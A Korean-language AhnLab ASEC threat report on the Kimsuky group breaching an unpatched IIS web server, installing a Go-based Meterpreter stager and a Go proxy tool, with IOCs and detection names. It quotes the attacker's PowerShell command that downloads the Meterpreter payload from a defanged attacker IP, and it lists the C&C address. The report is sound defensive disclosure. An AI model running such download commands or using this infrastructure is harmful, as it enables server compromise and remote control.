AhnLab Security Emergency response Center(ASEC)에서는 최근 Kimsuky (김수키) 공격 그룹이 웹 서버를 대상으로 악성코드를 유포하고 있는 것을 확인하였다. Kimsuky는 북한의 지원을 받고 있다고 확인되는 위협 그룹으로 2013년부터 활동하고 있다. 초기에는 한국의 북한 관련 연구기관 등에 대한 공격을 진행했으며 2014년 한국의 에너지 기관에 대한 공격을 진행했으며 2017년 이후 한국 외 다른 나라에 대한 공격도 진행하고 있다. [1]
ASEC에서는 블로그를 통해 Kimsuky 그룹의 다양한 공격 사례들을 분석하여 공개하고 있으며, 주로 메일에 MS 오피스 문서 파일이나 [2] 원노트 [3], CHM[4]과 같은 악성 파일들을 첨부하는 방식의 스피어 피싱 공격을 다루었다. Kimsuky 그룹의 공격 사례는 주로 이러한 스피어 피싱과 같은 사회공학적 공격 방식이 사용되지만 여기에서는 웹 서버를 대상으로 하는 공격 사례를 다룬다. Kimsuky는 공격에 성공한 이후 메타스플로잇 미터프리터(Metasploit Meterpreter) 백도어 악성코드를 설치하였으며, 이외에도 Go 언어로 개발된 프록시 악성코드를 설치한 이력도 확인된다.
1. IIS 웹 서버 대상 공격 사례
공격 대상이 된 곳은 국내 건축사무소의 윈도우 IIS 웹 서버로서 취약점이 패치되지 않았거나 부적절하게 관리되고 있는 것으로 추정된다. 공격자는 IIS 웹 서버를 공격하여 파워쉘 명령을 실행하였다. 다음은 자사 AhnLab Smart Defense(ASD) 로그로서 윈도우 IIS 웹 서버 프로세스인 w3wp.exe가 파워쉘을 이용해 외부에서 추가 페이로드를 다운로드하는 것을 확인할 수 있다.
실행된 파워쉘 명령은 다음과 같으며, 다운로드된 파일 “img.dat”은 메타스플로잇 미터프리터라고 하는 백도어 악성코드이다.
> powershell.exe invoke-webrequest -uri “hxxp://45.58.52[.]82/up.dat” -outfile “c:\programdata\img.dat”
공격자는 이후 미터프리터를 이용해 Proxy 악성코드를 추가적으로 설치하였으며, 여기에서도 파워쉘 명령이 사용되었다.
2. 미터프리터 악성코드
메타스플로잇(Metasploit)은 침투 테스트 목적의 프레임워크이다. 기업이나 기관의 네트워크 및 시스템에 대한 보안 취약점을 점검하기 위한 목적으로 사용 가능한 도구로서 침투 테스트 단계별로 다양한 기능들을 지원한다. 미터프리터는 메타스플로잇에서 제공하는 백도어 악성코드이며 공격자의 명령을 받아 다양한 악성 행위를 수행할 수 있다.
오픈 소스인 메타스플로잇은 접근성 때문에 다양한 공격자들에 의해 꾸준하게 사용되고 있는데, 이는 Kimsuky 그룹도 마찬가지이다. 과거 ASEC에서도 Kimsuky 그룹이 미터프리터를 AppleSeed 악성코드와 함께 공격에 사용한 사례들을 소개한 바 있다. [5] [6]
참고로 공격에 사용된 C&C 주소가 과거부터 Kimsuky 그룹에 의해 사용되고 있는 점 외에도 regsvr32.exe 프로세스에 의해 악성코드들을 실행한다는 점 또한 Kimsuky 그룹이 과거부터 사용하던 방식과 동일하다. 공격에 사용된 악성코드는 DLL 포맷이며 regsvr32.exe 프로세스에 로드되어 동작한다.
평소와 다른 점이 있다면 미터프리터의 스테이저(Stager) 악성코드가 Go 언어로 개발되어 있다는 점이다. Kimsuky 그룹은 과거에는 자체 제작한 형태였거나 이를 VMProtect와 같은 패커로 패킹한 후 미터프리터 스테이저를 유포하였다. 뒤에서 다룰 Proxy 악성코드 또한 Go 언어로 개발된 점을 통해 최근에는 진단을 우회하기 위해 악성코드 유포 시 Go 언어로 개발하는 것으로 추정된다.
3. Proxy (GoLang) 악성코드
미터프리터는 이후 공격자의 명령을 받아 파워쉘 명령을 실행하여 추가 악성코드를 설치하였다. 파워쉘 명령을 통해 다운로드된 악성코드는 Proxy 기능을 담당하는 악성코드이다. 참고로 Kimsuky 그룹은 과거부터 꾸준히 공격 과정에서 Proxy 악성코드를 사용하고 있다. [7] 해당 악성코드만의 특징이라고 한다면 과거와 달리 Go 언어로 개발되었다는 점이다.
이번 공격에 사용된 Proxy 악성코드는 다음과 같이 커맨드 라인 인자로 2개의 IP 주소 및 포트 번호를 전달받아 중계하는 역할을 한다. 과거 Proxy 도구와의 차이점이라고 한다면 통신 과정 검증에 사용될 것으로 추정되는 시그니처로 “aPpLe”이라고 하는 문자열이 사용된다는 점이 있다. 그리고 악성코드 실행 시 “127.0.0.1:3389”라고 하는 RDP 포트가 예시로 사용되는 것을 통해 공격자의 Proxy 악성코드 사용 목적이 추후 감염 시스템에 RDP 연결을 위한 것으로 추정된다.
4. 결론
최근 윈도우 IIS 웹 서버를 대상으로 Kimsuky 그룹의 공격 활동이 확인되고 있다. 로그를 통해 추정했을 때 Kimsuky 그룹은 부적절하게 관리되고 있거나 취약점이 패치되지 않은 웹 서버를 공격한 것으로 추정되며 이후 미터프리터를 설치하여 웹 서버에 대한 제어를 획득하였다.
서버 관리자는 서버 구성 환경이 취약할 경우 최신 버전으로 패치해 기존에 알려진 취약점으로부터 사전에 방지해야 한다. 또한 외부에 공개된 서버의 경우 보안 제품을 통해 외부인으로부터 접근을 통제할 필요가 있다. 또한 V3를 최신 버전으로 업데이트하여 악성코드의 감염을 사전에 차단할 수 있도록 신경 써야 한다.
파일 진단
– Backdoor/Win.Meterpreter.C5427507 (2023.05.15.02)
– HackTool/Win.Proxy.C5427508 (2023.05.15.02)
IOC
MD5
– 000130a373ea4085b87b97a0c7000c86 : 미터프리터 (img.dat)
– 6b2062e61bcb46ce5ff19b329ce31b03 : Proxy 악성코드 (cl.exe)
다운로드 주소
– hxxp://45.58.52[.]82/up.dat : 미터프리터
– hxxp://45.58.52[.]82/cl.exe : Proxy 악성코드
C&C 주소
– 45.58.52[.]82:8443 : 미터프리터
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보
[…] AppleSeed 외에도 Meterpreter와 같은 원격 제어 악성코드를 사용하고 있으며[1], VNC를 커스터마이징하여 사용하거나 RDP Wrapper와 같은 원격 제어 도구들을 […]
[…] [4] IIS 웹 서버가 공격 대상이 되었다. 이뿐만 아니라 Kimsuky 공격 그룹이 [5] IIS 웹 서버를 공격하거나 Lazarus 공격 그룹이 감염 이후 악성코드 배포 […]
[…] Meterpreter를 설치하는 다운로더 악성코드를 Go 언어로 개발하였으며, [3] RedEyes (APT37) 위협 그룹에서는 Ably 서비스를 악용하는 백도어를, [4] Andariel […]